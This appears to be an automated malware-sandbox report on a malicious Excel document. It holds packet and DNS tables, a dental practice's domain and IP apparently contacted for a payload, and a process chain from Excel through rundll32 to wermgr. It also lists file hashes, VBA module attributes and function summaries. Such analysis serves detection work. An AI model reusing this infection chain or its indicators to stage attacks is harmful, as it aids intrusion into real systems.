Jan 5, 2021 13:01:10.411004066 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.411025047 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.411032915 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.411047935 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.411058903 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.411070108 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.411088943 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.411092997 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.411118031 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.411120892 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.411143064 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.411144018 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.411175013 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.411184072 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.411197901 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.411210060 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.411220074 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.411242962 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.411242962 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.411271095 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.411290884 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.414251089 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.414288998 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.414361954 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.414547920 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.414573908 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.414597034 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.414618969 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.414618015 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.414640903 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.414657116 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.414663076 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.414689064 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.414726019 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.599364996 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.599395990 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.599407911 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.599420071 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.599431992 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.599483013 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.599499941 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.599514008 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.599530935 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.599615097 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.599617958 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.599656105 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.599667072 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.599739075 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.599778891 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.599796057 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.599811077 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.599827051 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.599838972 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.599850893 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.599859953 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.599883080 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.599895954 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.599910975 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.599924088 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.599927902 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.599944115 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.599957943 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.599972963 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.599972963 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.600003004 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.600034952 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.600080013 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.600090981 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.600122929 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.600140095 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.600157022 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.600214958 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.600233078 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.600245953 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.600249052 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.600265026 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.600281000 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.600295067 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.600296974 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.600308895 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.600348949 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.600356102 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.600373030 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.600388050 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.600402117 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.600404024 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.600446939 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.600707054 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.610342026 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.798475027 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 5, 2021 13:01:06.999558926 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 5, 2021 13:01:07.055907011 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
Jan 5, 2021 13:01:08.122844934 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 5, 2021 13:01:08.170912027 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22 |
Jan 5, 2021 13:01:08.184622049 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 5, 2021 13:01:08.232651949 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Jan 5, 2021 13:01:06.999558926 CET | 192.168.2.22 | 8.8.8.8 | 0x1168 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Jan 5, 2021 13:01:07.055907011 CET | 8.8.8.8 | 192.168.2.22 | 0x1168 | No error (0) | penrithdentalimplants.com.au | CNAME (Canonical name) | IN (0x0001) | ||
Jan 5, 2021 13:01:07.055907011 CET | 8.8.8.8 | 192.168.2.22 | 0x1168 | No error (0) | 160.153.76.195 | A (IP address) | IN (0x0001) |
HTTPS Packets |
---|
Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest |
---|---|---|---|---|---|---|---|---|---|---|
Jan 5, 2021 13:01:07.479768038 CET | 160.153.76.195 | 443 | 192.168.2.22 | 49167 | CN=penrithdentalimplants.com.au, O=Nepean Dental Implants and Cosmetic Dentistry, L=Penrith, ST=New South Wales, C=AU | CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Fri Aug 07 20:52:48 CEST 2020 | Wed Oct 06 15:19:58 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0 | 7dcce5b76c8b17472d024758970a406b |
| | | | | CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Tue May 03 09:00:00 CEST 2011 | Sat May 03 09:00:00 CEST 2031 | | |
Code Manipulations |
---|
System Behavior |
---|
General |
---|
Start time: | 13:00:41 |
Start date: | 05/01/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f220000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 13:00:50 |
Start date: | 05/01/2021 |
Path: | C:\Windows\System32\rundll32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffcd0000 |
File size: | 45568 bytes |
MD5 hash: | DD81D91FF3B0763C392422865C9AC12E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 13:00:51 |
Start date: | 05/01/2021 |
Path: | C:\Windows\SysWOW64\rundll32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x900000 |
File size: | 44544 bytes |
MD5 hash: | 51138BEEA3E2C21EC44D0932C71762A8 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 13:00:52 |
Start date: | 05/01/2021 |
Path: | C:\Windows\System32\wermgr.exe |
Wow64 process (32bit): | |
Commandline: | |
Imagebase: | |
File size: | 50688 bytes |
MD5 hash: | 41DF7355A5A907E2C1D7804EC028965D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Disassembly |
---|
Code Analysis |
---|
Module: \x041b\x0438\x0441\x04421 |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "\x041b\x0438\x0441\x04421" |
2 | Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = True |
7 | Attribute VB_TemplateDerived = False |
8 | Attribute VB_Customizable = True |
9 | Attribute VB_Control = "ListBox1, 2, 0, MSForms, ListBox" |
Executed Functions |
---|
C-Code - Quality: 76% |
Uniqueness Score: -1.00% |
Function 100018B0, Relevance: 33.5, APIs: 12, Strings: 7, Instructions: 286libraryloadermemoryCOMMON
C-Code - Quality: 74% |
Uniqueness Score: -1.00% |
Function 001E1030, Relevance: 18.4, APIs: 12, Instructions: 362libraryloaderCOMMON
Uniqueness Score: -1.00% |
Function 002E1000, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100windowtimesleepCOMMON
C-Code - Quality: 100% |
Uniqueness Score: -1.00% |
Function 0032188B, Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 404processlibraryloaderCOMMON
Uniqueness Score: -1.00% |
Function 001E14A0, Relevance: 12.2, APIs: 8, Instructions: 171COMMON
Uniqueness Score: -1.00% |
Uniqueness Score: -1.00% |
Function 001E21A0, Relevance: 6.2, APIs: 4, Instructions: 182COMMON
Uniqueness Score: -1.00% |
Uniqueness Score: -1.00% |
Function 10005FC1, Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMON
C-Code - Quality: 100% |
Uniqueness Score: -1.00% |
Function 001E1D10, Relevance: 1.6, APIs: 1, Instructions: 112COMMON
Uniqueness Score: -1.00% |
Function 1000631C, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
C-Code - Quality: 25% |
Uniqueness Score: -1.00% |
Function 10001050, Relevance: 1.3, APIs: 1, Instructions: 22memoryCOMMON
C-Code - Quality: 100% |
Uniqueness Score: -1.00% |
Function 001E19F0, Relevance: 1.3, APIs: 1, Instructions: 14memoryCOMMON
Uniqueness Score: -1.00% |
Function 001E1820, Relevance: 1.3, APIs: 1, Instructions: 11COMMON
Uniqueness Score: -1.00% |
Non-executed Functions |
---|
Function 100026C4, Relevance: 7.6, APIs: 5, Instructions: 57COMMON
C-Code - Quality: 85% |
Uniqueness Score: -1.00% |
Function 100050A3, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
C-Code - Quality: 37% |
Uniqueness Score: -1.00% |
C-Code - Quality: 78% |
Uniqueness Score: -1.00% |
Function 001A095E, Relevance: .4, Instructions: 362COMMON
Uniqueness Score: -1.00% |
Function 001A0456, Relevance: .1, Instructions: 80COMMON
Uniqueness Score: -1.00% |
Function 100043B0, Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
C-Code - Quality: 91% |
Uniqueness Score: -1.00% |
Function 100040D7, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 46libraryloaderCOMMON
C-Code - Quality: 86% |
Uniqueness Score: -1.00% |
Function 1000462B, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON
C-Code - Quality: 39% |
Uniqueness Score: -1.00% |
Function 10003954, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMON
C-Code - Quality: 65% |
Uniqueness Score: -1.00% |
Function 100014E0, Relevance: 6.1, APIs: 4, Instructions: 104COMMON
C-Code - Quality: 100% |
Uniqueness Score: -1.00% |
Function 1000DEFB, Relevance: 6.1, APIs: 4, Instructions: 101COMMON
C-Code - Quality: 100% |
Uniqueness Score: -1.00% |
Function 10003829, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
C-Code - Quality: 100% |
Uniqueness Score: -1.00% |
Function 1000825B, Relevance: 6.0, APIs: 4, Instructions: 47COMMON
C-Code - Quality: 89% |
Uniqueness Score: -1.00% |
Function 001E2430, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63memoryCOMMON
Uniqueness Score: -1.00% |